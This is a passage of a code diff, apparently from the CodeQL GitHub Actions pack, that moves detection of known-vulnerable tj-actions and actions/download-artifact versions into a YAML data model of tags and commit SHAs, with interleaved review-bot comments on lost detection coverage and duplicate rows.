- "74dc2e8", "8356a01", "baaf598", "8a4cc4f", "8a7336f", "3996bc3", "ef0a290", - "3ebdc42", "94e6fba", "3dbb79f", "991e8b3", "72d3bb8", "72d3bb8", "5f89dc7", - "734bb16", "d2e030b", "6ba3c59", "d0e4477", "b91acef", "1263363", "7184077", - "cbfb0fd", "932dad3", "9f28968", "c4d29bf", "ce4b8e3", "aa52cfc", "aa52cfc", - "1d6e210", "8953e85", "8de562e", "7c640bd", "2706452", "1d6e210", "dd7c814", - "528984a", "75af1a4", "5184a75", "dd7c814", "402f382", "402f382", "f7a5640", - "df4daca", "602081b", "6e12407", "c5c9b6f", "c41b715", "60f4aab", "82edb42", - "18edda7", "bec82eb", "f7a5640", "28ac672", "602cf94", "5e56dca", "58ae566", - "7394701", "36e65a1", "bf6ddb7", "6c44eb8", "b2ee165", "34a865a", "fb1fe28", - "ae90a0b", "bc1dc8f", "3de1f9a", "0edfedf", "2054502", "944a8b8", "581eef0", - "e55f7fb", "07b38ce", "d262520", "a6d456f", "a59f800", "a2f1692", "72aab29", - "e35d0af", "081ee9c", "1f30bd2", "227e314", "ffd30e8", "f5a8de7", "0bc7d40", - "a53d74f", "9335416", "4daffba", "4b1f26a", "09441d3", "e44053b", "c0dba81", - "fd2e991", "2a8a501", "a8ea720", "88edda5", "be68c10", "b59431b", "68bd279", - "2c85495", "f276697", "00f80ef", "f56e736", "019a09d", "3b638a9", "b42f932", - "8dfe0ee", "aae164d", "09a8797", "b54a7ae", "902e607", "2b51570", "040111b", - "3b638a9", "1d34e69", "b86b537", "2a771ad", "75933dc", "2c0d12b", "7abdbc9", - "675ab58", "8c6f276", "d825b1f", "0bd70b7", "0fe67a1", "7bfa539", "d679de9", - "1e10ed4", "0754fda", "d290bdd", "15b1769", "2ecd06d", "5fe8e4d", "7c66aa2", - "2ecd06d", "e95bba8", "7852058", "81f32e2", "450eadf", "0e956bb", "300e935", - "fcb2ab8", "271bbd6", "e8ace01", "473984b", "032f37f", "3a35bdf", "c2216f6", - "0f16c26", "271468e", "fb063fc", "a05436f", "c061ef1", "489e2d5", "8d5a33c", - "fbfaba5", "1980f55", "a86b560", "f917cc3", "e18ccae", "e1d275d", "00f80ef", - "9c1a181", "5eaa2d8", "188487d", "3098891", "467d26c", "d9eb683", "09a8797", - "8e7cc77", "81ad4b8", "5e2a2f1", "1af9ab3", "55a857d", "62a9200", "b915d09", - "f0751de", "eef9423" - 
] + "%") + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) ) and this.asExpr() = u ) @@ -207,24 +163,14 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { */ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { TJActionsVerifyChangedFilesSource() { - exists(UsesStep u | + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and u.getCallee() = "tj-actions/verify-changed-files" and + u.getCallee() = vulnerable_action and ( - u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 17 or - u.getVersion() - .matches([ - "54e20d3", "a9b6fd3", "30aa174", "7f1b21c", "54e20d3", "0409e18", "7da22d0", - "7016858", "0409e18", "7517b83", "bad2f5d", "3b573ac", "7517b83", "f557547", - "9ed3155", "f557547", "a3391b5", "a3391b5", "1d7ee97", "c432297", "6e986df", - "fa6ea30", "6f40ee1", "1b13d25", "c09bcad", "fda469d", "bd1e271", "367ba21", - "9dea97e", "c154cc6", "527ff75", "e8756d5", "bcb4e76", "25267f5", "ea24bfd", - "f2a40ba", "197e121", "a8f1b11", "95c26dd", "97ba4cc", "68310bb", "720ba6a", - "cedd709", "d68d3d2", "2e1153b", "c3dd635", "81bd1de", "31a9c74", "e981d37", - "e7f801c", "e86d0b9", "ad255a4", "3a8aed1", "de910b5", "d31b2a1", "e61c6fc", - "380890d", "873cfd6", "b0c60c8", "7183183", "6555389", "9828a95", "8150cee", - "48ddf88" - ] + "%") + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) ) and this.asExpr() = u ) diff --git a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll new file mode 100644 index 000000000000..bbb021fe3d55 --- /dev/null +++ b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll 
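Review bot: Replacing `u.getMajorVersion() < 41` with exact `getVersion() = vulnerable_version or getVersion() = vulnerable_sha` matches against the MaD rows narrows detection: an older tag that is missing from vulnerable_actions.yml (a patch release not enumerated, or a row typo) no longer marks the step as a source, whereas the range check caught every pre-fix major. The same coverage is lost in the second hunk on this line, where the `< 17` check for `tj-actions/verify-changed-files` is dropped. Since the data already carries the fixed major in `fixed_version`, binding it instead of `_` and keeping the range as a fallback preserves the old behaviour: `vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, fixed_version) and` at the top of the `exists`, and `or u.getMajorVersion() < fixed_version.toInt()` as a third disjunct next to the version/SHA test.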
@@ -0,0 +1,23 @@
+import actions
+import codeql.actions.config.Config
+
+class KnownVulnerableAction extends UsesStep {
+ string vulnerable_action;
+ string fixed_version;
+ string vulnerable_version;
+ string vulnerable_sha;
+
+ KnownVulnerableAction() {
+ vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, fixed_version) and
+ this.getCallee() = vulnerable_action and
+ (this.getVersion() = vulnerable_version or this.getVersion() = vulnerable_sha)
+ }
+
+ string getFixedVersion() { result = fixed_version }
+
+ string getVulnerableAction() { result = vulnerable_action }
+
+ string getVulnerableVersion() { result = vulnerable_version }
+
+ string getVulnerableSha() { result = vulnerable_sha }
+}
diff --git a/ql/lib/ext/config/vulnerable_actions.yml
new file mode 100644
index 000000000000..eb452983bfc5
--- /dev/null
+++ b/ql/lib/ext/config/vulnerable_actions.yml
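Review bot: The four fields of `KnownVulnerableAction` are bound once per matching MaD row, and the rows added in vulnerable_actions.yml map several tags to one commit (`v3` and `v3.0.2` both to `9bc31d5c…`, `v2` and `v2.1.1` both to `cbed621e…`), so a step pinned to such a SHA gets two `vulnerable_version` values and a `select` that prints `getVulnerableVersion()` reports it twice with different messages. Either state this in the QLDoc or make the getters functional by picking a canonical row (for instance an aggregate over the bound values), and say which in the doc. The class and its members also have no QLDoc at all; a header such as `/** A uses-step whose callee and version or SHA match a row of vulnerableActionsDataModel; getters return the matched row's columns. */` plus one line per getter would make the contract readable from the query side.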
@@ -0,0 +1,641 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: vulnerableActionsDataModel + data: + + # gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate | jq -r '.[] | "- \"\(.name)\", \"\(.sha)\""' + + # + # actions/download-artifact + - ["actions/download-artifact", "v4.1.6", "9c19ed7fe5d278cd354c7dfd5d3b88589c7e2395", "4.1.7"] + - ["actions/download-artifact", "v4.1.5", "8caf195ad4b1dee92908e23f56eeb0696f1dd42d", "4.1.7"] + - ["actions/download-artifact", "v4.1.4", "c850b930e6ba138125429b7e5c93fc707a7f8427", "4.1.7"] + - ["actions/download-artifact", "v4.1.3", "87c55149d96e628cc2ef7e6fc2aab372015aec85", "4.1.7"] + - ["actions/download-artifact", "v4.1.2", "eaceaf801fd36c7dee90939fad912460b18a1ffe", "4.1.7"] + - ["actions/download-artifact", "v4.1.1", "6b208ae046db98c579e8a3aa621ab581ff575935", "4.1.7"] + - ["actions/download-artifact", "v4.1.0", "f44cd7b40bfd40b6aa1cc1b9b5b7bf03d3c67110", "4.1.7"] + - ["actions/download-artifact", "v4.0.0", "7a1cd3216ca9260cd8022db641d960b1db4d1be4", "4.1.7"] + - ["actions/download-artifact", "v3.0.2", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3.0.1", "9782bd6a9848b53b110e712e20e42d89988822b7", "4.1.7"] + - ["actions/download-artifact", "v3.0.0", "fb598a63ae348fa914e94cd0ff38f362e927b741", "4.1.7"] + - ["actions/download-artifact", "v3", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3-node20", "246d7188e736d3686f6d19628d253ede9697bd55", "4.1.7"] + - ["actions/download-artifact", "v2.1.1", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v2.1.0", "f023be2c48cc18debc3bacd34cb396e0295e2869", "4.1.7"] + - ["actions/download-artifact", "v2.0.10", "3be87be14a055c47b01d3bd88f8fe02320a9bb60", "4.1.7"] + - ["actions/download-artifact", "v2.0.9", "158ca71f7c614ae705e79f25522ef4658df18253", "4.1.7"] + - ["actions/download-artifact", "v2.0.8", 
"4a7a711286f30c025902c28b541c10e147a9b843", "4.1.7"] + - ["actions/download-artifact", "v2.0.7", "f144d3c3916a86f4d6b11ff379d17a49d8f85dbc", "4.1.7"] + - ["actions/download-artifact", "v2.0.6", "f8e41fbffeebb48c0273438d220bb2387727471f", "4.1.7"] + - ["actions/download-artifact", "v2.0.5", "c3f5d00c8784369c43779f3d2611769594a61f7a", "4.1.7"] + - ["actions/download-artifact", "v2.0.4", "b3cedea9bed36890c824f4065163b667eeca272b", "4.1.7"] + - ["actions/download-artifact", "v2.0.3", "80d2d4023c185001eacb50e37afd7dd667ba8044", "4.1.7"] + - ["actions/download-artifact", "v2.0.2", "381af06b4268a1e0ad7b7c7e5a09f1894977120f", "4.1.7"] + - ["actions/download-artifact", "v2.0.1", "1ac47ba4b6af92e65d0438b64ce1ea49ce1cc48d", "4.1.7"] + - ["actions/download-artifact", "v2.0", "1de1dea89c32dcb1f37183c96fe85cfe067b682a", "4.1.7"] + - ["actions/download-artifact", "v2", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "v1", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + + # tj-actions/changed-files + # https://github.com/advisories/GHSA-mcph-m25j-8j63 + # CVE-2023-51664 + - ["tj-actions/changed-files", "v40.2.3", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v40.2.2", "94549999469dbfa032becf298d95c87a14c34394", "41"] + - ["tj-actions/changed-files", "v40.2.1", "1c938490c880156b746568a518594309cfb3f66b", "41"] + - ["tj-actions/changed-files", "v40.2.0", "da093c1609db0edd0a037ce9664e135f74bf30d9", "41"] + - ["tj-actions/changed-files", "v40.1.1", "25ef3926d147cd02fc7e931c1ef50772bbb0d25d", "41"] + - ["tj-actions/changed-files", "v40.1.0", "18c8a4ecebe93d32ed8a88e1d0c098f5f68c221b", "41"] + - ["tj-actions/changed-files", "v40.0.2", "40526807ee1e208a1a8c1bbe6bd2d1b044ef6368", "41"] + - 
["tj-actions/changed-files", "v40.0.1", "bfc49f4cff6934aa236c171f9bcbf1dd6b1ef438", "41"] + - ["tj-actions/changed-files", "v40.0.0", "af292f1e845a0377b596972698a8598734eb2796", "41"] + - ["tj-actions/changed-files", "v40", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v39.2.4", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v39.2.3", "95690f9ece77c1740f4a55b7f1de9023ed6b1f87", "41"] + - ["tj-actions/changed-files", "v39.2.2", "408093d9ff9c134c33b974e0722ce06b9d6e8263", "41"] + - ["tj-actions/changed-files", "v39.2.1", "db153baf731265ad02cd490b07f470e2d55e3345", "41"] + - ["tj-actions/changed-files", "v39.2.0", "8238a4103220c636f2dad328ead8a7c8dbe316a3", "41"] + - ["tj-actions/changed-files", "v39.1.2", "41960309398d165631f08c5df47a11147e14712b", "41"] + - ["tj-actions/changed-files", "v39.1.1", "a21a533a0c244a27daac02f9dc6fcf8aeb996154", "41"] + - ["tj-actions/changed-files", "v39.1.0", "8e79ba7ab9fee9984275219aeb2c8db47bcb8a2d", "41"] + - ["tj-actions/changed-files", "v39.0.3", "76c4d81a6acd339b55bd7407a016981c853eb702", "41"] + - ["tj-actions/changed-files", "v39.0.2", "6ee9cdc5816333acda68e01cf12eedc619e28316", "41"] + - ["tj-actions/changed-files", "v39.0.1", "246636f5fa148b5ad8e65ca4c57b18af3123e5f6", "41"] + - ["tj-actions/changed-files", "v39.0.0", "48566bbcc22ceb7c5809ebdd27377309f2c3de8c", "41"] + - ["tj-actions/changed-files", "v39", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v38.2.2", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v38.2.1", "2f7246cb26e8bb6709b6cbfc1fec7febfe82e96a", "41"] + - ["tj-actions/changed-files", "v38.2.0", "0fc9663aa70243d87319dbd32fd926344d18d38f", "41"] + - ["tj-actions/changed-files", "v38.1.3", "c860b5c47fa71f461da850094ef2f6e3d6514e44", "41"] + - ["tj-actions/changed-files", "v38.1.2", "2f8b80270f04e421b28efb2abaccef4fce4815b6", "41"] + - ["tj-actions/changed-files", 
"v38.1.1", "b7f1b7347fea1df67230801b66081fe3cba7dc69", "41"] + - ["tj-actions/changed-files", "v38.1.0", "1c26215f3fbd51eba03bc199e5cbabdfc3584ce3", "41"] + - ["tj-actions/changed-files", "v38.0.0", "17f3fec1edef0c3916d59cbcee1585fcd457e456", "41"] + - ["tj-actions/changed-files", "v38", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v37.6.1", "a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v37.6.0", "87697c0dca7dd44e37a2b79a79489332556ff1f3", "41"] + - ["tj-actions/changed-files", "v37.5.2", "85c8b8252fc9893e00b3633a16670e53040e6d71", "41"] + - ["tj-actions/changed-files", "v37.5.1", "a96679dfee2a1e64b1db5a210c0ffaf1f2cb24ce", "41"] + - ["tj-actions/changed-files", "v37.5.0", "920e7b9ae1d45913fc81f86c956fee89c77d2e5e", "41"] + - ["tj-actions/changed-files", "v37.4.0", "de0eba32790fb9bf87471b32855a30fc8f9d5fc6", "41"] + - ["tj-actions/changed-files", "v37.3.0", "39283171cefdf491e0f0d6cf285b86b31eb6f3cd", "41"] + - ["tj-actions/changed-files", "v37.2.0", "68b429ddc666ea0dba46309e1ee45e06bb408df8", "41"] + - ["tj-actions/changed-files", "v37.1.2", "2a968ff601949c81b47d9c1fdb789b0d25ddeea2", "41"] + - ["tj-actions/changed-files", "v37.1.1", "1f20fb83f05eabed6e12ba0329edac8b6ec8e207", "41"] + - ["tj-actions/changed-files", "v37.1.0", "87e23c4c79a603288642711155953c7da34b11ac", "41"] + - ["tj-actions/changed-files", "v37.0.5", "54849deb963ca9f24185fb5de2965e002d066e6b", "41"] + - ["tj-actions/changed-files", "v37.0.4", "bb3376162b179308a79fc4450262a15a8e1d6888", "41"] + - ["tj-actions/changed-files", "v37.0.3", "ec1e14cf27f4585783f463070881b2c499349a8a", "41"] + - ["tj-actions/changed-files", "v37.0.2", "2106eb4457dd2aba4d37c8cdd16acba5d18739b9", "41"] + - ["tj-actions/changed-files", "v37.0.1", "e5efec47f620e0fde64a1ad8f53bbf53d51a8c97", "41"] + - ["tj-actions/changed-files", "v37.0.0", "5817a9efb0d7cc34b917d8146ea10b9f32044968", "41"] + - ["tj-actions/changed-files", "v37", 
"a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v36.4.1", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v36.4.0", "e1754a427f478b8778d349341b8f1d80f1f47f44", "41"] + - ["tj-actions/changed-files", "v36.3.0", "9bf09145c3560e451e8d8e87b42ccb3fef5b692d", "41"] + - ["tj-actions/changed-files", "v36.2.1", "c9124514c375de5dbb9697afa6f2e36a236ee58c", "41"] + - ["tj-actions/changed-files", "v36.2.0", "174a2a6360b54a2019877c254c4be78106efc94f", "41"] + - ["tj-actions/changed-files", "v36.1.0", "fb20f4d24890fadc539505b1746d260504b213d0", "41"] + - ["tj-actions/changed-files", "v36.0.18", "07e0177b72d3640efced741cae32f9861eee1367", "41"] + - ["tj-actions/changed-files", "v36.0.17", "b13786805affca18e536ed489687d3d8d1f05d21", "41"] + - ["tj-actions/changed-files", "v36.0.16", "1aae16084af435f73c8cdfd742473028810c5f20", "41"] + - ["tj-actions/changed-files", "v36.0.15", "5d2fcdb4cbef720a52f49fd05d8c7edd18a64758", "41"] + - ["tj-actions/changed-files", "v36.0.14", "9ecc6e7fe2e26945b52485ccd9bc4b44000f5af1", "41"] + - ["tj-actions/changed-files", "v36.0.13", "8c9ee56d0180a538ad5b6b8a208e4db974bad9c0", "41"] + - ["tj-actions/changed-files", "v36.0.12", "5978e5a2df95ef20cde627d4acb5edd1f87ba46a", "41"] + - ["tj-actions/changed-files", "v36.0.11", "17c3e9e98f47ef859502ba3e38be0b8a6a4bddd9", "41"] + - ["tj-actions/changed-files", "v36.0.10", "3f7b5c900bdbf1b80a825e220413986227b3ff03", "41"] + - ["tj-actions/changed-files", "v36.0.9", "cf4fe8759a45edd76ed6215da3529d2dbd2a3c68", "41"] + - ["tj-actions/changed-files", "v36.0.8", "043929ee8fffa1dd1d619782a5a338cf39e76e23", "41"] + - ["tj-actions/changed-files", "v36.0.7", "4e2535f2b330e70ff7055f7de4272653cfdbd555", "41"] + - ["tj-actions/changed-files", "v36.0.6", "652648acb4f32660a94e245a2a51c6d0e56b2a1d", "41"] + - ["tj-actions/changed-files", "v36.0.5", "9ad1a5b96ab3e56cd2bb25ff90c6271e4e70eb71", "41"] + - ["tj-actions/changed-files", "v36.0.4", 
"c798a4ea57f0e0a9d2b5374853c9c479ebb435a2", "41"] + - ["tj-actions/changed-files", "v36.0.3", "25eaddf37ae893cec889065e9a60439c8af6f089", "41"] + - ["tj-actions/changed-files", "v36.0.2", "abef388dd913ce13a650bbf800eba73961657fb9", "41"] + - ["tj-actions/changed-files", "v36.0.1", "1c2673b763ea086acd660dd4257c9be06eb77667", "41"] + - ["tj-actions/changed-files", "v36.0.0", "53c377a374b445ec2a61e343068807bf41f2c9a6", "41"] + - ["tj-actions/changed-files", "v36", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v35.9.3", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"] + - ["tj-actions/changed-files", "v35.9.3-sec", "8663bb8fc810b983a35585a2dd6a121c09d2590d", "41"] + - ["tj-actions/changed-files", "v35.9.2", "b2d17f51244a144849c6b37a3a6791b98a51d86f", "41"] + - ["tj-actions/changed-files", "v35.9.2-sec", "4fc4e9d28ecb58e0215483343f3dd2fd01178f42", "41"] + - ["tj-actions/changed-files", "v35.9.1", "4a0aac0d19aa2838c6741fdf95a5276390418dc2", "41"] + - ["tj-actions/changed-files", "v35.9.1-sec", "89daa3bca3cd1f2967097668c0e8b5f7dda4d57f", "41"] + - ["tj-actions/changed-files", "v35.9.0", "ce810b29b28abf274afebdcd8fe47b8fba0f28bd", "41"] + - ["tj-actions/changed-files", "v35.9.0-sec", "2e61fb6a48f5857e3a338b4cbf071e1164c060e9", "41"] + - ["tj-actions/changed-files", "v35.8.0", "7ecfc6730dff8072d1cc5215a24cc9478f55264d", "41"] + - ["tj-actions/changed-files", "v35.8.0-sec", "21d7a75834ad73fed7fa33b39b73ebe6495ee4e1", "41"] + - ["tj-actions/changed-files", "v35.7.12", "b109d83a62e94cf7c522bf6c15cb25c175850b16", "41"] + - ["tj-actions/changed-files", "v35.7.12-sec", "2be7c3758f3e6e45ae5d27c133a3260c5b0fdd60", "41"] + - ["tj-actions/changed-files", "v35.7.11", "79adacd43ea069e57037edc891ea8d33013bc3da", "41"] + - ["tj-actions/changed-files", "v35.7.11-sec", "123dfd48407ae53e33a73e2ae9adf9d8ad8b14d6", "41"] + - ["tj-actions/changed-files", "v35.7.10", "6e426e6495fa7ea3451f37ce3f1dac2a3f16f62c", "41"] + - ["tj-actions/changed-files", 
"v35.7.10-sec", "61bf27253df806648581aaddd4a8ec394b968c80", "41"] + - ["tj-actions/changed-files", "v35.7.9", "5e2d64b30d51d557c5a29309ecbd5481a236ec77", "41"] + - ["tj-actions/changed-files", "v35.7.9-sec", "b94d96993dacb3158c51d22c3afae1f4059a71d2", "41"] + - ["tj-actions/changed-files", "v35.7.8", "e9b5807e928fc8eea705c90da5524fd44b183ba1", "41"] + - ["tj-actions/changed-files", "v35.7.8-sec", "22bed7e94fbb176468579214290dfd84abc6ea86", "41"] + - ["tj-actions/changed-files", "v35.7.7", "db5dd7c176cf59a19ef6561bf1936f059dee4b74", "41"] + - ["tj-actions/changed-files", "v35.7.7-sec", "7795905b24e743c8c33cd5ba5cd256cc92c81f68", "41"] + - ["tj-actions/changed-files", "v35.7.6", "07f86bcdc42639264ec561c7f175fea5f532b6ce", "41"] + - ["tj-actions/changed-files", "v35.7.6-sec", "08d9eb809753cbbaf6c8256285605312ce3987b9", "41"] + - ["tj-actions/changed-files", "v35.7.5", "3a3ec498d8976e74f5dd829c413c1d446e738df7", "41"] + - ["tj-actions/changed-files", "v35.7.4", "ee137444f0b3b0855cb2fc7df807416ba2c3d311", "41"] + - ["tj-actions/changed-files", "v35.7.3", "cda290230383045a8887a250c2abf796bf1dc6da", "41"] + - ["tj-actions/changed-files", "v35.7.2", "9328bab880abf4acc377d77718d28c6ac167f154", "41"] + - ["tj-actions/changed-files", "v35.7.1", "4e680e146a8e1b530a912f0a1fdc2f0ace7d1bb7", "41"] + - ["tj-actions/changed-files", "v35.7.1-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"] + - ["tj-actions/changed-files", "v35.7.0", "bd376fbcfae914347656e4c70801e2a3fafed05b", "41"] + - ["tj-actions/changed-files", "v35.7.0-sec", "1d1543af8cef13eb42c756e9425e2cc50e8030b0", "41"] + - ["tj-actions/changed-files", "v35.6.4", "84ed30e2f4daf616144de7e0c1db59d5b33025e3", "41"] + - ["tj-actions/changed-files", "v35.6.3", "74b06cafc9658d2a91cc5ceb920fd6b5a5649051", "41"] + - ["tj-actions/changed-files", "v35.6.2", "5ce975c6021a0b11062c547acb6c26c96a34a8c5", "41"] + - ["tj-actions/changed-files", "v35.6.1", "04124efe7560d15e11ea2ba96c0df2989f68f1f4", "41"] + - 
["tj-actions/changed-files", "v35.6.0", "3ee6abf6107ccc2d8ee538de7ff6b1fb644f5d60", "41"] + - ["tj-actions/changed-files", "v35.5.6", "23e3c4300cb904a9d9c36fc2df4111a2fa9b9ff1", "41"] + - ["tj-actions/changed-files", "v35.5.5", "5a331a4999f9f21a3ef2a6459edee90393a8b92a", "41"] + - ["tj-actions/changed-files", "v35.5.4", "74338865c1e73fee674ce5cfc5d28f4b9caa33bc", "41"] + - ["tj-actions/changed-files", "v35.5.3", "d5414fd30b0b7618c815fe7ebe5673720e081937", "41"] + - ["tj-actions/changed-files", "v35.5.2", "7f2aa19bdcf4a00195671e368091a1e32a694ac5", "41"] + - ["tj-actions/changed-files", "v35.5.1", "210cc839c24f532fe4fbf510b7b3314ca9a2b90b", "41"] + - ["tj-actions/changed-files", "v35.5.0", "db3ea27a0cf07135175be5efe7aaf84df6e0e6f0", "41"] + - ["tj-actions/changed-files", "v35.4.4", "57d9664f8e2aa45f26bcb59095f99aa47ae8e90d", "41"] + - ["tj-actions/changed-files", "v35.4.3", "0953088baa540166372190bec608cad1603a787d", "41"] + - ["tj-actions/changed-files", "v35.4.2", "0562b9f865df79542dfcd59cfbd14c9ac9a792d3", "41"] + - ["tj-actions/changed-files", "v35.4.1", "487675b843e203b5c9a92a07f1ed763d046d7283", "41"] + - ["tj-actions/changed-files", "v35.4.0", "9a6dabf8d15381f97f1c770257a1a0db59c28a47", "41"] + - ["tj-actions/changed-files", "v35.3.2", "7839ede089e483df865be448d6f3652f875005e0", "41"] + - ["tj-actions/changed-files", "v35.3.1", "c2296c1b044b4f5c97d310a6d31e95cbcb5583ec", "41"] + - ["tj-actions/changed-files", "v35.3.0", "ea251d4d2f03a9c18841ae1b752f58b82dfb4d5e", "41"] + - ["tj-actions/changed-files", "v35.2.1", "1d1287f9fafd92be283f99b781fb5f00f00dd471", "41"] + - ["tj-actions/changed-files", "v35.2.0", "392359fc8c85be1a8752e9ab6b1ad9e45158b4a9", "41"] + - ["tj-actions/changed-files", "v35.1.2", "7f33882a1271950f8592f96b77e694436bfee83b", "41"] + - ["tj-actions/changed-files", "v35.1.1", "1d8a2f91371fd14ec6146c37cbae79526144fbe9", "41"] + - ["tj-actions/changed-files", "v35.1.0", "0626c3f94002c0a9d7491dd7fed7055bbdff6f92", "41"] + - 
["tj-actions/changed-files", "v35.0.1", "a2b1e5dbb92d21753cf198228fbf2d0a8557f117", "41"]
+ - ["tj-actions/changed-files", "v35.0.0", "110b9baa5fc65597d65c1d019c6d3aee16d00c53", "41"]
+ - ["tj-actions/changed-files", "v35", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"]
+ - ["tj-actions/changed-files", "v35-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"]
+ - ["tj-actions/changed-files", "v34.6.2", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"]
+ - ["tj-actions/changed-files", "v34.6.1", "3b6c057cd82d1dafab565df2ba9fa489574a03b8", "41"]
+ - ["tj-actions/changed-files", "v34.6.0", "4f64429e8be26fe81a594635b07ed829581ea847", "41"]
+ - ["tj-actions/changed-files", "v34.5.4", "3f1e44af6ca48144748dfc62a7a6fb22e4ca67f3", "41"]
+ - ["tj-actions/changed-files", "v34.5.3", "74dc2e8a7877b725678a2195226bd470f10c481b", "41"]
+ - ["tj-actions/changed-files", "v34.5.2", "8356a01788b5a36aa0319e74183f3237e020feac", "41"]
+ - ["tj-actions/changed-files", "v34.5.1", "baaf598b46c2d9eb97eb995c9f69d1967349155d", "41"]
+ - ["tj-actions/changed-files", "v34.5.0", "8a4cc4fbd67975557b6d85dd302f5f9400b9c92e", "41"]
+ - ["tj-actions/changed-files", "v34.4.4", "8a7336fb6f6bc00da867b745d3491de42ac0231b", "41"]
+ - ["tj-actions/changed-files", "v34.4.3", "3996bc3fded83a011dbfc57f379fd31266770b3a", "41"]
+ - ["tj-actions/changed-files", "v34.4.2", "ef0a29048c50f844e30fac9fef80956f9765aab8", "41"]
+ - ["tj-actions/changed-files", "v34.4.1", "3ebdc42d8ba53fedc5bef0f16181249ac58446fa", "41"]
+ - ["tj-actions/changed-files", "v34.4.0", "94e6fba8d802f0fa80db51937e8752e9c165ee26", "41"]
+ - ["tj-actions/changed-files", "v34.3.4", "3dbb79f46716e706df6be563a268df44b264b545", "41"]
+ - ["tj-actions/changed-files", "v34.3.3", "991e8b3aae0ebbe0614b15b05d14ccb92affa24a", "41"]
+ - ["tj-actions/changed-files", "v34.3.2", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"]
+ - ["tj-actions/changed-files", "v34.3.1", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"]
+ - ["tj-actions/changed-files", "v34.3.0", "5f89dc7d6eefdcb7323e773671fd3461a7c2f050", "41"]
+ - ["tj-actions/changed-files", "v34.2.2", "734bb168e38279dfc7aa2af5d5be3a1475427a99", "41"]
+ - ["tj-actions/changed-files", "v34.2.1", "d2e030b6ed85ce2db7ac1a4afc574640df8bca26", "41"]
+ - ["tj-actions/changed-files", "v34.2.0", "6ba3c59bc6825f1ad375d92a9e70c6b275db0ddd", "41"]
+ - ["tj-actions/changed-files", "v34.1.1", "d0e44775cd5572bb0ead1d7d2e399015644f7359", "41"]
+ - ["tj-actions/changed-files", "v34.1.0", "b91acef304123e58fd6671ab267d6b5e2a7f2ef3", "41"]
+ - ["tj-actions/changed-files", "v34.0.5", "12633630aba2ab48ec2ad8a3344dd736d61a7b89", "41"]
+ - ["tj-actions/changed-files", "v34.0.4", "71840771e95943b1ab0c8f8ae45aeb0a34458e2e", "41"]
+ - ["tj-actions/changed-files", "v34.0.3", "cbfb0fda5afcfbf4ef0ef854bf0d8210abd0866f", "41"]
+ - ["tj-actions/changed-files", "v34.0.2", "932dad31974f07bd23cab5870d45c6e5ad5c8b73", "41"]
+ - ["tj-actions/changed-files", "v34.0.1", "9f289689bb8364780830da00b69507b88b5a2f07", "41"]
+ - ["tj-actions/changed-files", "v34.0.0", "c4d29bf5b2769a725bcc9a723c498ba9c34c05b4", "41"]
+ - ["tj-actions/changed-files", "v34", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"]
+ - ["tj-actions/changed-files", "v33.0.0", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"]
+ - ["tj-actions/changed-files", "v33", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"]
+ - ["tj-actions/changed-files", "v32.1.2", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"]
+ - ["tj-actions/changed-files", "v32.1.1", "8953e851a137075e59e84b5c15fbeb3617e82f15", "41"]
+ - ["tj-actions/changed-files", "v32.1.0", "8de562e9316b23c4473ad852e5fd4f7f2bac7bc8", "41"]
+ - ["tj-actions/changed-files", "v32.0.1", "7c640bd299646362775f9d02e156bc741f67453b", "41"]
+ - ["tj-actions/changed-files", "v32.0.0", "270645280afddc7e2cf3f4867089522c8f2f8f9a", "41"]
